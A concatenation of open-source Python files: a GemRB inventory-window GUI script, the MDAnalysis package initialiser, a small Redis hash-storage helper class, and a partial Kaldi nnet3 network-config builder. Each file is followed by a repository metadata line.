	Button.SetFlags (IE_GUI_BUTTON_ALIGN_RIGHT | IE_GUI_BUTTON_ALIGN_BOTTOM | IE_GUI_BUTTON_PICTURE, OP_OR)
	#major & minor clothing color
	Button = Window.GetControl (62)
	Button.SetFlags (IE_GUI_BUTTON_PICTURE,OP_OR)
	Button.SetEvent (IE_GUI_BUTTON_ON_PRESS, InventoryCommon.MajorPress)
	Button.SetTooltip (12007)
	Button = Window.GetControl (63)
	Button.SetFlags (IE_GUI_BUTTON_PICTURE,OP_OR)
	Button.SetEvent (IE_GUI_BUTTON_ON_PRESS, InventoryCommon.MinorPress)
	Button.SetTooltip (12008)
	#hair & skin color
	Button = Window.GetControl (82)
	Button.SetFlags (IE_GUI_BUTTON_PICTURE,OP_OR)
	Button.SetEvent (IE_GUI_BUTTON_ON_PRESS, InventoryCommon.HairPress)
	Button.SetTooltip (37560)
	Button = Window.GetControl (83)
	Button.SetFlags (IE_GUI_BUTTON_PICTURE,OP_OR)
	Button.SetEvent (IE_GUI_BUTTON_ON_PRESS, InventoryCommon.SkinPress)
	Button.SetTooltip (37559)
	# paperdoll
	Button = Window.GetControl (50)
	Button.SetState (IE_GUI_BUTTON_LOCKED)
	Button.SetFlags (IE_GUI_BUTTON_NO_IMAGE | IE_GUI_BUTTON_PICTURE | IE_GUI_BUTTON_ANIMATED, OP_SET)
	Button.SetEvent (IE_GUI_BUTTON_ON_DRAG_DROP, InventoryCommon.OnAutoEquip)
	# portrait
	Button = Window.GetControl (84)
	Button.SetState (IE_GUI_BUTTON_LOCKED)
	Button.SetFlags (IE_GUI_BUTTON_NO_IMAGE | IE_GUI_BUTTON_PICTURE, OP_SET)
	# armor class
	Label = Window.GetControl (0x10000038)
	Label.SetTooltip (17183)
	# hp current
	Label = Window.GetControl (0x10000039)
	Label.SetTooltip (17184)
	# hp max
	Label = Window.GetControl (0x1000003a)
	Label.SetTooltip (17378)
	# info label, game paused, etc
	Label = Window.GetControl (0x1000003f)
	Label.SetText ("")
	# one button per engine-defined inventory slot (slots are 1-based)
	SlotCount = GemRB.GetSlotType (-1)["Count"]
	for slot in range (SlotCount):
		SlotType = GemRB.GetSlotType (slot+1)
		if SlotType["ID"]:
			Button = Window.GetControl (SlotType["ID"])
			Button.SetEvent (IE_GUI_MOUSE_ENTER_BUTTON, InventoryCommon.MouseEnterSlot)
			Button.SetEvent (IE_GUI_MOUSE_LEAVE_BUTTON, InventoryCommon.MouseLeaveSlot)
			Button.SetVarAssoc ("ItemButton", slot+1)
			Button.SetFont ("NUMFONT")
	GemRB.SetVar ("TopIndex", 0)
	# quick-weapon selector: four radio buttons bound to the "Equipped" var
	for i in range (4):
		Button = Window.GetControl (109+i)
		Button.SetEvent (IE_GUI_BUTTON_ON_PRESS, ChangeWeaponPressed)
		Button.SetVarAssoc("Equipped", i)
		Button.SetFlags (IE_GUI_BUTTON_RADIOBUTTON, OP_OR)
		#Why they mess up .chu's i don't know
		Button.SetSprites("INVBUT3", i, 0, 1, 2, 3)
	return
def ChangeWeaponPressed ():
	"""Equip the quick-weapon slot chosen via the "Equipped" GUI variable."""
	# arguments evaluate left-to-right, matching the original call order
	GemRB.SetEquippedQuickSlot (GemRB.GameGetSelectedPCSingle (), GemRB.GetVar ("Equipped"), -1)
	return
#complete update
def UpdateInventoryWindow (Window):
	"""Full refresh of the inventory window for the selected PC."""
	pc = GemRB.GameGetSelectedPCSingle ()
	# ground container scrollbar range follows the item count (min 1)
	Container = GemRB.GetContainer (pc, 1)
	ScrollBar = Window.GetControl (66)
	Count = Container['ItemCount']
	if Count<1:
		Count=1
	ScrollBar.SetVarAssoc ("TopIndex", Count)
	# sync the quick-weapon radio buttons with the engine state
	Equipped = GemRB.GetEquippedQuickSlot (pc, 1)
	GemRB.SetVar ("Equipped", Equipped)
	for i in range (4):
		Button = Window.GetControl (109+i)
		Button.SetVarAssoc("Equipped", i)
	RefreshInventoryWindow ()
	# populate inventory slot controls
	SlotCount = GemRB.GetSlotType (-1)["Count"]
	for i in range (SlotCount):
		InventoryCommon.UpdateSlot (pc, i)
	return
# Expose the updater to InventoryCommon so shared item-handling code can
# refresh this window after drag/drop operations.
InventoryCommon.UpdateInventoryWindow = UpdateInventoryWindow
# Window loaders for window 2 of the GUIINV winpack; Toggle presumably flips
# visibility while Open shows the window once -- see GUICommonWindows.
ToggleInventoryWindow = GUICommonWindows.CreateTopWinLoader(2, "GUIINV", GUICommonWindows.ToggleWindow, InitInventoryWindow, UpdateInventoryWindow)
OpenInventoryWindow = GUICommonWindows.CreateTopWinLoader(2, "GUIINV", GUICommonWindows.OpenWindowOnce, InitInventoryWindow, UpdateInventoryWindow)
def RefreshInventoryWindow ():
	"""Redraw the dynamic content of the inventory window for the selected PC."""
	Window = InventoryWindow
	pc = GemRB.GameGetSelectedPCSingle ()
	# name
	Label = Window.GetControl (0x10000032)
	Label.SetText (GemRB.GetPlayerName (pc, 0))
	# paperdoll
	Button = Window.GetControl (50)
	Color1 = GemRB.GetPlayerStat (pc, IE_METAL_COLOR)
	Color2 = GemRB.GetPlayerStat (pc, IE_MINOR_COLOR)
	Color3 = GemRB.GetPlayerStat (pc, IE_MAJOR_COLOR)
	Color4 = GemRB.GetPlayerStat (pc, IE_SKIN_COLOR)
	Color5 = GemRB.GetPlayerStat (pc, IE_LEATHER_COLOR)
	Color6 = GemRB.GetPlayerStat (pc, IE_ARMOR_COLOR)
	Color7 = GemRB.GetPlayerStat (pc, IE_HAIR_COLOR)
	Button.SetFlags (IE_GUI_BUTTON_CENTER_PICTURES, OP_OR)
	pdoll = GUICommonWindows.GetActorPaperDoll (pc)+"G11"
	# only animate when the paperdoll BAM resource actually exists
	if GemRB.HasResource (pdoll, RES_BAM):
		Button.SetAnimation (pdoll)
		Button.SetAnimationPalette (Color1, Color2, Color3, Color4, Color5, Color6, Color7, 0)
	# portrait
	Button = Window.GetControl (84)
	Button.SetPicture (GemRB.GetPlayerPortrait (pc, 0)["Sprite"])
	# encumbrance
	GUICommon.SetEncumbranceLabels (Window, 0x10000042, None, pc)
	# armor class
	ac = GemRB.GetPlayerStat (pc, IE_ARMORCLASS)
	Label = Window.GetControl (0x10000038)
	Label.SetText (str (ac))
	# hp current
	hp = GemRB.GetPlayerStat (pc, IE_HITPOINTS)
	Label = Window.GetControl (0x10000039)
	Label.SetText (str (hp))
	# hp max
	hpmax = GemRB.GetPlayerStat (pc, IE_MAXHITPOINTS)
	Label = Window.GetControl (0x1000003a)
	Label.SetText (str (hpmax))
	# party gold
	Label = Window.GetControl (0x10000040)
	Label.SetText (str (GemRB.GameGetPartyGold ()))
	# color swatches: the low byte of each color stat is the gradient index
	Button = Window.GetControl (62)
	Color = GemRB.GetPlayerStat (pc, IE_MAJOR_COLOR, 1) & 0xFF
	Button.SetBAM ("COLGRAD", 0, 0, Color)
	Button = Window.GetControl (63)
	Color = GemRB.GetPlayerStat (pc, IE_MINOR_COLOR, 1) & 0xFF
	Button.SetBAM ("COLGRAD", 0, 0, Color)
	Button = Window.GetControl (82)
	Color = GemRB.GetPlayerStat (pc, IE_HAIR_COLOR, 1) & 0xFF
	Button.SetBAM ("COLGRAD", 0, 0, Color)
	Button = Window.GetControl (83)
	Color = GemRB.GetPlayerStat (pc, IE_SKIN_COLOR, 1) & 0xFF
	Button.SetBAM ("COLGRAD", 0, 0, Color)
	# update ground inventory slots
	Container = GemRB.GetContainer(pc, 1)
	TopIndex = GemRB.GetVar ("TopIndex")
	for i in range (6):
		# first five buttons are controls 68-72, the sixth is control 81
		if i<5:
			Button = Window.GetControl (i+68)
		else:
			Button = Window.GetControl (i+76)
		if GemRB.IsDraggingItem ()==1:
			Button.SetState (IE_GUI_BUTTON_FAKEPRESSED)
		else:
			Button.SetState (IE_GUI_BUTTON_ENABLED)
		Button.SetEvent (IE_GUI_BUTTON_ON_DRAG_DROP, InventoryCommon.OnDragItemGround)
		Slot = GemRB.GetContainerItem (pc, i+TopIndex)
		if Slot == None:
			# empty slot: clear all click handlers
			Button.SetEvent (IE_GUI_BUTTON_ON_PRESS, None)
			Button.SetEvent (IE_GUI_BUTTON_ON_RIGHT_PRESS, None)
			Button.SetEvent (IE_GUI_BUTTON_ON_SHIFT_PRESS, None)
		else:
			Button.SetEvent (IE_GUI_BUTTON_ON_PRESS, InventoryCommon.OnDragItemGround)
			Button.SetEvent (IE_GUI_BUTTON_ON_RIGHT_PRESS, InventoryCommon.OpenGroundItemInfoWindow)
			Button.SetEvent (IE_GUI_BUTTON_ON_SHIFT_PRESS, InventoryCommon.OpenGroundItemAmountWindow)
		GUICommon.UpdateInventorySlot (pc, Button, Slot, "ground")
	#if actor is uncontrollable, make this grayed
	GUICommon.AdjustWindowVisibility (Window, pc, False)
	return
###################################################
# End of file GUIINV.py
| bradallred/gemrb | gemrb/GUIScripts/iwd2/GUIINV.py | Python | gpl-2.0 | 8,644 |
# -*- Mode: python; tab-width: 4; indent-tabs-mode:nil; coding:utf-8 -*-
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4
#
# MDAnalysis --- https://www.mdanalysis.org
# Copyright (c) 2006-2017 The MDAnalysis Development Team and contributors
# (see the file AUTHORS for the full list of names)
#
# Released under the GNU Public Licence, v2 or any higher version
#
# Please cite your use of MDAnalysis in published work:
#
# R. J. Gowers, M. Linke, J. Barnoud, T. J. E. Reddy, M. N. Melo, S. L. Seyler,
# D. L. Dotson, J. Domanski, S. Buchoux, I. M. Kenney, and O. Beckstein.
# MDAnalysis: A Python package for the rapid analysis of molecular dynamics
# simulations. In S. Benthall and S. Rostrup editors, Proceedings of the 15th
# Python in Science Conference, pages 102-109, Austin, TX, 2016. SciPy.
# doi: 10.25080/majora-629e541a-00e
#
# N. Michaud-Agrawal, E. J. Denning, T. B. Woolf, and O. Beckstein.
# MDAnalysis: A Toolkit for the Analysis of Molecular Dynamics Simulations.
# J. Comput. Chem. 32 (2011), 2319--2327, doi:10.1002/jcc.21787
#
"""
:mod:`MDAnalysis` --- analysis of molecular simulations in python
=================================================================
MDAnalysis (https://www.mdanalysis.org) is a python toolkit to analyze
molecular dynamics trajectories generated by CHARMM, NAMD, Amber,
Gromacs, or LAMMPS.
It allows one to read molecular dynamics trajectories and access the
atomic coordinates through numpy arrays. This provides a flexible and
relatively fast framework for complex analysis tasks. In addition,
CHARMM-style atom selection commands are implemented. Trajectories can
also be manipulated (for instance, fit to a reference structure) and
written out. Time-critical code is written in C for speed.
Help is also available through the mailinglist at
http://groups.google.com/group/mdnalysis-discussion
Please report bugs and feature requests through the issue tracker at
https://github.com/MDAnalysis/mdanalysis/issues
Citation
--------
When using MDAnalysis in published work, please cite
R. J. Gowers, M. Linke, J. Barnoud, T. J. E. Reddy, M. N. Melo, S. L. Seyler,
D. L. Dotson, J. Domanski, S. Buchoux, I. M. Kenney, and O. Beckstein.
MDAnalysis: A Python package for the rapid analysis of molecular dynamics
simulations. In S. Benthall and S. Rostrup, editors, Proceedings of the 15th
Python in Science Conference, pages 98-105, Austin, TX, 2016. SciPy,
doi:10.25080/majora-629e541a-00e
N. Michaud-Agrawal, E. J. Denning, T. B. Woolf, and
O. Beckstein. MDAnalysis: A Toolkit for the Analysis of Molecular Dynamics
Simulations. J. Comput. Chem. 32 (2011), 2319--2327, doi:`10.1002/jcc.21787`_
https://www.mdanalysis.org
For citations of included algorithms and sub-modules please see the references_.
.. _`10.1002/jcc.21787`: http://dx.doi.org/10.1002/jcc.21787
.. _references: https://docs.mdanalysis.org/documentation_pages/references.html
Getting started
---------------
Import the package::
>>> import MDAnalysis
(note that not everything in MDAnalysis is imported right away; for
additional functionality you might have to import sub-modules
separately, e.g. for RMS fitting ``import MDAnalysis.analysis.align``.)
Build a "universe" from a topology (PSF, PDB) and a trajectory (DCD, XTC/TRR);
here we are assuming that PSF, DCD, etc contain file names. If you don't have
trajectories at hand you can play with the ones that come with MDAnalysis for
testing (see below under `Examples`_)::
>>> u = MDAnalysis.Universe(PSF, DCD)
Select the C-alpha atoms and store them as a group of atoms::
>>> ca = u.select_atoms('name CA')
>>> len(ca)
214
Calculate the centre of mass of the CA and of all atoms::
>>> ca.center_of_mass()
array([ 0.06873595, -0.04605918, -0.24643682])
>>> u.atoms.center_of_mass()
array([-0.01094035, 0.05727601, -0.12885778])
Calculate the CA end-to-end distance (in angstroem)::
>>> import numpy as np
>>> coord = ca.positions
>>> v = coord[-1] - coord[0] # last Ca minus first one
>>> np.sqrt(np.dot(v, v,))
10.938133
Define a function eedist():
>>> def eedist(atoms):
... coord = atoms.positions
... v = coord[-1] - coord[0]
... return sqrt(dot(v, v,))
...
>>> eedist(ca)
10.938133
and analyze all timesteps *ts* of the trajectory::
>>> for ts in u.trajectory:
... print eedist(ca)
10.9381
10.8459
10.4141
9.72062
....
See Also
--------
:class:`MDAnalysis.core.universe.Universe` for details
Examples
--------
MDAnalysis comes with a number of real trajectories for testing. You
can also use them to explore the functionality and ensure that
everything is working properly::
from MDAnalysis import *
from MDAnalysis.tests.datafiles import PSF,DCD, PDB,XTC
u_dims_adk = Universe(PSF,DCD)
u_eq_adk = Universe(PDB, XTC)
The PSF and DCD file are a closed-form-to-open-form transition of
Adenylate Kinase (from [Beckstein2009]_) and the PDB+XTC file are ten
frames from a Gromacs simulation of AdK solvated in TIP4P water with
the OPLS/AA force field.
.. [Beckstein2009] O. Beckstein, E.J. Denning, J.R. Perilla and T.B. Woolf,
Zipping and Unzipping of Adenylate Kinase: Atomistic Insights into the
Ensemble of Open <--> Closed Transitions. J Mol Biol 394 (2009), 160--176,
doi:10.1016/j.jmb.2009.09.009
"""
__all__ = ['Universe', 'Writer', 'fetch_mmtf',
           'AtomGroup', 'ResidueGroup', 'SegmentGroup']

import logging
import warnings

# Module-level logger for import-time messages (e.g. missing authors.py).
logger = logging.getLogger("MDAnalysis.__init__")

from .version import __version__
try:
    from .authors import __authors__
except ImportError:
    # authors.py may be absent (e.g. in a raw checkout); degrade gracefully.
    logger.info('Could not find authors.py, __authors__ will be empty.')
    __authors__ = []

# Registry of Readers, Parsers and Writers known to MDAnalysis
# Metaclass magic fills these as classes are declared.
_READERS = {}
_READER_HINTS = {}
_SINGLEFRAME_WRITERS = {}
_MULTIFRAME_WRITERS = {}
_PARSERS = {}
_PARSER_HINTS = {}
_SELECTION_WRITERS = {}
_CONVERTERS = {}
# Registry of TopologyAttributes
_TOPOLOGY_ATTRS = {}  # {attrname: cls}
_TOPOLOGY_TRANSPLANTS = {}  # {name: [attrname, method, transplant class]}
_TOPOLOGY_ATTRNAMES = {}  # {lower case name w/o _ : name}

# custom exceptions and warnings
from .exceptions import (
    SelectionError, NoDataError, ApplicationError, SelectionWarning,
    MissingDataWarning, ConversionWarning, FileFormatWarning,
    StreamWarning
)

from .lib import log
from .lib.log import start_logging, stop_logging

# Attach a no-op handler so users who have not configured logging do not get
# "no handlers could be found" noise from library code.
logging.getLogger("MDAnalysis").addHandler(log.NullHandler())
del logging

# only MDAnalysis DeprecationWarnings are loud by default
warnings.filterwarnings(action='once', category=DeprecationWarning,
                        module='MDAnalysis')

from . import units

# Bring some often used objects into the current namespace
from .core.universe import Universe, Merge
from .core.groups import AtomGroup, ResidueGroup, SegmentGroup
from .coordinates.core import writer as Writer

# After Universe import
from .coordinates.MMTF import fetch_mmtf

from . import converters

# Register the package's citations with duecredit (a no-op stub otherwise).
from .due import due, Doi, BibTeX
due.cite(Doi("10.25080/majora-629e541a-00e"),
         description="Molecular simulation analysis library",
         path="MDAnalysis", cite_module=True)
due.cite(Doi("10.1002/jcc.21787"),
         description="Molecular simulation analysis library",
         path="MDAnalysis", cite_module=True)
del Doi, BibTeX
| MDAnalysis/mdanalysis | package/MDAnalysis/__init__.py | Python | gpl-2.0 | 7,425 |
import redis
from hashlib import sha1
class RedisHashLayer(object):
    """
    A more memory-efficient way to store many small values in redis using hashes.
    See http://antirez.com/post/redis-weekly-update-7.html
    Note: add these config value to redis:
    hash-max-zipmap-entries 512
    hash-max-zipmap-value 512
    """

    def __init__(self, connection, name):
        # connection: a redis client (or anything exposing hget/hset/hdel/
        # keys/pipeline); name: namespace prefix for all hash keys.
        self.connection = connection
        self.name = name

    def _get_hashname(self, key):
        """Return (hash key, field) for *key*.

        Keys are bucketed into many small hashes by the first 4 hex chars of
        the SHA-1 of the key, so each hash stays small enough for redis's
        memory-efficient ziplist encoding.
        """
        # encode() so this also works on Python 3, where sha1() needs bytes.
        field = sha1(str(key).encode('utf-8')).hexdigest()
        hashkey = "%s:%s" % (self.name, field[:4])
        return (hashkey, field)

    def __contains__(self, key):
        """True if *key* has been add()ed and not delete()d."""
        hashkey, field = self._get_hashname(key)
        return self.connection.hget(hashkey, field) is not None

    def add(self, key):
        """Record *key* (stores the field name as its own value)."""
        hashkey, field = self._get_hashname(key)
        self.connection.hset(hashkey, field, field)
        return

    def delete(self, key):
        """Remove *key* if present.

        Bug fix: the original called hset() right before hdel(), which was
        useless work and could leave the field behind if hdel failed.
        """
        hashkey, field = self._get_hashname(key)
        self.connection.hdel(hashkey, field)
        return

    def clear(self):
        """Delete every hash belonging to this layer.

        NOTE(review): KEYS is O(keyspace) and blocks the redis server;
        SCAN would be preferable on large instances.
        """
        pipeline = self.connection.pipeline()
        keys = self.connection.keys(self.name + "*")
        for k in keys:
            pipeline.delete(k)
        pipeline.execute()
        return
| dfdeshom/reds | reds/redis_hash_layer.py | Python | gpl-2.0 | 1,323 |
#!/usr/bin/env python
# Note: this file is part of some nnet3 config-creation tools that are now deprecated.
from __future__ import print_function
import os
import argparse
import sys
import warnings
import copy
from operator import itemgetter
def GetSumDescriptor(inputs):
    """Combine descriptor strings into a single nested Sum() descriptor.

    Pairs of descriptors are repeatedly wrapped as "Sum(a, b)" until one
    descriptor remains.  Empty/whitespace-only entries are ignored.

    Parameters
    ----------
    inputs : list of str
        Descriptor strings to sum.  Unlike the original implementation,
        the caller's list is NOT modified (the old code pop()ed from it).

    Returns
    -------
    list of str
        A single-element list with the combined descriptor.

    Raises
    ------
    ValueError
        If no non-empty descriptor was supplied (the original code would
        loop forever in that case).
    """
    # Work on a filtered copy; the original destructively consumed `inputs`
    # and skipped blank entries one pop() at a time.
    sum_descriptors = [d for d in inputs if d.strip() != '']
    if not sum_descriptors:
        raise ValueError("GetSumDescriptor: no non-empty descriptors given")
    while len(sum_descriptors) != 1:
        cur_sum_descriptors = []
        pair = []
        while len(sum_descriptors) > 0:
            value = sum_descriptors.pop()
            pair.append(value)
            if len(pair) == 2:
                cur_sum_descriptors.append("Sum({0}, {1})".format(pair[0], pair[1]))
                pair = []
        if pair:
            # Odd element left over; it is carried into the next round.
            cur_sum_descriptors.append(pair[0])
        sum_descriptors = cur_sum_descriptors
    return sum_descriptors
# adds the input nodes and returns the descriptor
def AddInputLayer(config_lines, feat_dim, splice_indexes=[0], ivector_dim=0):
    """Add the input node(s) and return the spliced input descriptor.

    Appends an 'input-node' (and, if ivector_dim > 0, an 'ivector' node) to
    config_lines, and builds a descriptor splicing the requested time
    offsets together.
    """
    components = config_lines['components']
    component_nodes = config_lines['component-nodes']
    components.append('input-node name=input dim=' + str(feat_dim))

    # One Offset(...) term per splice index; offset 0 is just 'input'.
    descriptors = []
    for n in splice_indexes:
        descriptors.append('Offset(input, {0})'.format(n) if n != 0 else 'input')
    output_dim = feat_dim * len(splice_indexes)

    if ivector_dim > 0:
        components.append('input-node name=ivector dim=' + str(ivector_dim))
        descriptors.append('ReplaceIndex(ivector, t, 0)')
        output_dim += ivector_dim

    if len(descriptors) == 1:
        splice_descriptor = descriptors[0]
    else:
        splice_descriptor = "Append({0})".format(", ".join(descriptors))
    # The original implementation echoes the descriptor to stdout.
    print(splice_descriptor)
    return {'descriptor': splice_descriptor,
            'dimension': output_dim}
def AddNoOpLayer(config_lines, name, input):
    """Add a NoOpComponent that passes its input through unchanged."""
    dim = input['dimension']
    config_lines['components'].append(
        'component name={0}_noop type=NoOpComponent dim={1}'.format(name, dim))
    config_lines['component-nodes'].append(
        'component-node name={0}_noop component={0}_noop input={1}'.format(
            name, input['descriptor']))
    return {'descriptor': '{0}_noop'.format(name), 'dimension': dim}
def AddLdaLayer(config_lines, name, input, lda_file):
    # Thin alias kept for backward compatibility: an "LDA layer" is just a
    # fixed (non-trainable) affine transform loaded from lda_file.
    return AddFixedAffineLayer(config_lines, name, input, lda_file)
def AddFixedAffineLayer(config_lines, name, input, matrix_file):
    """Add a non-trainable FixedAffineComponent loaded from matrix_file."""
    comp_tpl = 'component name={0}_fixaffine type=FixedAffineComponent matrix={1}'
    node_tpl = 'component-node name={0}_fixaffine component={0}_fixaffine input={1}'
    config_lines['components'].append(comp_tpl.format(name, matrix_file))
    config_lines['component-nodes'].append(node_tpl.format(name, input['descriptor']))
    # This layer does not change the dimension.
    return {'descriptor': '{0}_fixaffine'.format(name),
            'dimension': input['dimension']}
def AddBlockAffineLayer(config_lines, name, input, output_dim, num_blocks):
    """Add a BlockAffineComponent (block-diagonal affine transform)."""
    in_dim = input['dimension']
    # Both dimensions must split evenly across the blocks.
    assert in_dim % num_blocks == 0 and output_dim % num_blocks == 0
    config_lines['components'].append(
        'component name={0}_block_affine type=BlockAffineComponent '
        'input-dim={1} output-dim={2} num-blocks={3}'.format(
            name, in_dim, output_dim, num_blocks))
    config_lines['component-nodes'].append(
        'component-node name={0}_block_affine component={0}_block_affine '
        'input={1}'.format(name, input['descriptor']))
    return {'descriptor': '{0}_block_affine'.format(name),
            'dimension': output_dim}
def AddPermuteLayer(config_lines, name, input, column_map):
    """Add a PermuteComponent that reorders input columns by column_map.

    column_map is an iterable of integer column indices; it is rendered as a
    comma-separated list in the config line.
    """
    components = config_lines['components']
    component_nodes = config_lines['component-nodes']
    # Idiom: map(str, ...) instead of map(lambda x: str(x), ...).
    permute_indexes = ",".join(map(str, column_map))
    components.append('component name={0}_permute type=PermuteComponent column-map={1}'.format(name, permute_indexes))
    component_nodes.append('component-node name={0}_permute component={0}_permute input={1}'.format(name, input['descriptor']))
    # Permutation preserves the dimension.
    return {'descriptor': '{0}_permute'.format(name),
            'dimension': input['dimension']}
def AddAffineLayer(config_lines, name, input, output_dim, ng_affine_options = "", max_change_per_component = 0.75):
    """Add a trainable NaturalGradientAffineComponent layer."""
    # Per-component max-change option (empty string disables it).
    if max_change_per_component is not None:
        max_change_options = "max-change={0:.2f}".format(max_change_per_component)
    else:
        max_change_options = ''
    config_lines['components'].append(
        "component name={0}_affine type=NaturalGradientAffineComponent "
        "input-dim={1} output-dim={2} {3} {4}".format(
            name, input['dimension'], output_dim, ng_affine_options, max_change_options))
    config_lines['component-nodes'].append(
        "component-node name={0}_affine component={0}_affine input={1}".format(
            name, input['descriptor']))
    return {'descriptor': '{0}_affine'.format(name),
            'dimension': output_dim}
def AddAffRelNormLayer(config_lines, name, input, output_dim, ng_affine_options = " bias-stddev=0 ", norm_target_rms = 1.0, self_repair_scale = None, max_change_per_component = 0.75):
    """Add an affine -> ReLU -> renormalize stack and return its output."""
    components = config_lines['components']
    component_nodes = config_lines['component-nodes']
    # Optional option strings; empty when the corresponding value is None.
    # self_repair_scale scales the self-repair vector computed in
    # RectifiedLinearComponent.
    self_repair_string = ''
    if self_repair_scale is not None:
        self_repair_string = "self-repair-scale={0:.10f}".format(self_repair_scale)
    max_change_options = ''
    if max_change_per_component is not None:
        max_change_options = "max-change={0:.2f}".format(max_change_per_component)
    components.extend([
        "component name={0}_affine type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3} {4}".format(name, input['dimension'], output_dim, ng_affine_options, max_change_options),
        "component name={0}_relu type=RectifiedLinearComponent dim={1} {2}".format(name, output_dim, self_repair_string),
        "component name={0}_renorm type=NormalizeComponent dim={1} target-rms={2}".format(name, output_dim, norm_target_rms),
    ])
    component_nodes.extend([
        "component-node name={0}_affine component={0}_affine input={1}".format(name, input['descriptor']),
        "component-node name={0}_relu component={0}_relu input={0}_affine".format(name),
        "component-node name={0}_renorm component={0}_renorm input={0}_relu".format(name),
    ])
    return {'descriptor': '{0}_renorm'.format(name),
            'dimension': output_dim}
def AddAffPnormLayer(config_lines, name, input, pnorm_input_dim, pnorm_output_dim, ng_affine_options = " bias-stddev=0 ", norm_target_rms = 1.0):
    """Add an affine -> p-norm -> renormalize stack and return its output."""
    components = config_lines['components']
    component_nodes = config_lines['component-nodes']
    components.extend([
        "component name={0}_affine type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3}".format(name, input['dimension'], pnorm_input_dim, ng_affine_options),
        "component name={0}_pnorm type=PnormComponent input-dim={1} output-dim={2}".format(name, pnorm_input_dim, pnorm_output_dim),
        "component name={0}_renorm type=NormalizeComponent dim={1} target-rms={2}".format(name, pnorm_output_dim, norm_target_rms),
    ])
    component_nodes.extend([
        "component-node name={0}_affine component={0}_affine input={1}".format(name, input['descriptor']),
        "component-node name={0}_pnorm component={0}_pnorm input={0}_affine".format(name),
        "component-node name={0}_renorm component={0}_renorm input={0}_pnorm".format(name),
    ])
    # The p-norm reduces pnorm_input_dim down to pnorm_output_dim.
    return {'descriptor': '{0}_renorm'.format(name),
            'dimension': pnorm_output_dim}
def AddConvolutionLayer(config_lines, name, input,
                        input_x_dim, input_y_dim, input_z_dim,
                        filt_x_dim, filt_y_dim,
                        filt_x_step, filt_y_step,
                        num_filters, input_vectorization,
                        param_stddev = None, bias_stddev = None,
                        filter_bias_file = None,
                        is_updatable = True):
    """Add a ConvolutionComponent over a 3-d (x, y, z) input volume.

    Returns a dict with the output descriptor, the flattened output
    dimension, the output 3-d shape ('3d-dim') and its vectorization order.

    NOTE(review): param_stddev, bias_stddev and is_updatable are accepted
    for interface compatibility but are not used by this implementation.
    """
    assert(input['dimension'] == input_x_dim * input_y_dim * input_z_dim)
    components = config_lines['components']
    component_nodes = config_lines['component-nodes']

    conv_init_string = ("component name={name}_conv type=ConvolutionComponent "
                        "input-x-dim={input_x_dim} input-y-dim={input_y_dim} input-z-dim={input_z_dim} "
                        "filt-x-dim={filt_x_dim} filt-y-dim={filt_y_dim} "
                        "filt-x-step={filt_x_step} filt-y-step={filt_y_step} "
                        "input-vectorization-order={vector_order}".format(name = name,
                        input_x_dim = input_x_dim, input_y_dim = input_y_dim, input_z_dim = input_z_dim,
                        filt_x_dim = filt_x_dim, filt_y_dim = filt_y_dim,
                        filt_x_step = filt_x_step, filt_y_step = filt_y_step,
                        vector_order = input_vectorization))
    if filter_bias_file is not None:
        # Filters (and biases) are initialized from a matrix file.
        conv_init_string += " matrix={0}".format(filter_bias_file)
    else:
        conv_init_string += " num-filters={0}".format(num_filters)

    components.append(conv_init_string)
    component_nodes.append("component-node name={0}_conv_t component={0}_conv input={1}".format(name, input['descriptor']))

    # Bug fix: use floor division; plain '/' yields floats under Python 3,
    # which would make the returned dimensions non-integers.
    num_x_steps = 1 + (input_x_dim - filt_x_dim) // filt_x_step
    num_y_steps = 1 + (input_y_dim - filt_y_dim) // filt_y_step
    output_dim = num_x_steps * num_y_steps * num_filters
    return {'descriptor': '{0}_conv_t'.format(name),
            'dimension': output_dim,
            '3d-dim': [num_x_steps, num_y_steps, num_filters],
            'vectorization': 'zyx'}
# The Maxpooling component assumes input vectorizations of type zyx
def AddMaxpoolingLayer(config_lines, name, input,
                       input_x_dim, input_y_dim, input_z_dim,
                       pool_x_size, pool_y_size, pool_z_size,
                       pool_x_step, pool_y_step, pool_z_step):
    """Add a MaxpoolingComponent over a 3-d input (zyx vectorization assumed).

    Raises Exception if the pool sizes/steps are inconsistent with the input
    dimensions.  Returns a dict with the output descriptor, flattened
    dimension, 3-d shape and vectorization order.
    """
    if input_x_dim < 1 or input_y_dim < 1 or input_z_dim < 1:
        raise Exception("non-positive maxpooling input size ({0}, {1}, {2})".
                        format(input_x_dim, input_y_dim, input_z_dim))
    if pool_x_size > input_x_dim or pool_y_size > input_y_dim or pool_z_size > input_z_dim:
        raise Exception("invalid maxpooling pool size vs. input size")
    if pool_x_step > pool_x_size or pool_y_step > pool_y_size or pool_z_step > pool_z_size:
        raise Exception("invalid maxpooling pool step vs. pool size")
    assert(input['dimension'] == input_x_dim * input_y_dim * input_z_dim)

    components = config_lines['components']
    component_nodes = config_lines['component-nodes']
    components.append('component name={name}_maxp type=MaxpoolingComponent '
                      'input-x-dim={input_x_dim} input-y-dim={input_y_dim} input-z-dim={input_z_dim} '
                      'pool-x-size={pool_x_size} pool-y-size={pool_y_size} pool-z-size={pool_z_size} '
                      'pool-x-step={pool_x_step} pool-y-step={pool_y_step} pool-z-step={pool_z_step} '.
                      format(name = name,
                      input_x_dim = input_x_dim, input_y_dim = input_y_dim, input_z_dim = input_z_dim,
                      pool_x_size = pool_x_size, pool_y_size = pool_y_size, pool_z_size = pool_z_size,
                      pool_x_step = pool_x_step, pool_y_step = pool_y_step, pool_z_step = pool_z_step))
    component_nodes.append('component-node name={0}_maxp_t component={0}_maxp input={1}'.format(name, input['descriptor']))

    # Bug fix: floor division; plain '/' yields floats under Python 3,
    # making the returned dimensions non-integers.
    num_pools_x = 1 + (input_x_dim - pool_x_size) // pool_x_step
    num_pools_y = 1 + (input_y_dim - pool_y_size) // pool_y_step
    num_pools_z = 1 + (input_z_dim - pool_z_size) // pool_z_step
    output_dim = num_pools_x * num_pools_y * num_pools_z
    return {'descriptor': '{0}_maxp_t'.format(name),
            'dimension': output_dim,
            '3d-dim': [num_pools_x, num_pools_y, num_pools_z],
            'vectorization': 'zyx'}
def AddSoftmaxLayer(config_lines, name, input):
    """Add a LogSoftmaxComponent over the input's dimension."""
    dim = input['dimension']
    config_lines['components'].append(
        "component name={0}_log_softmax type=LogSoftmaxComponent dim={1}".format(name, dim))
    config_lines['component-nodes'].append(
        "component-node name={0}_log_softmax component={0}_log_softmax input={1}".format(
            name, input['descriptor']))
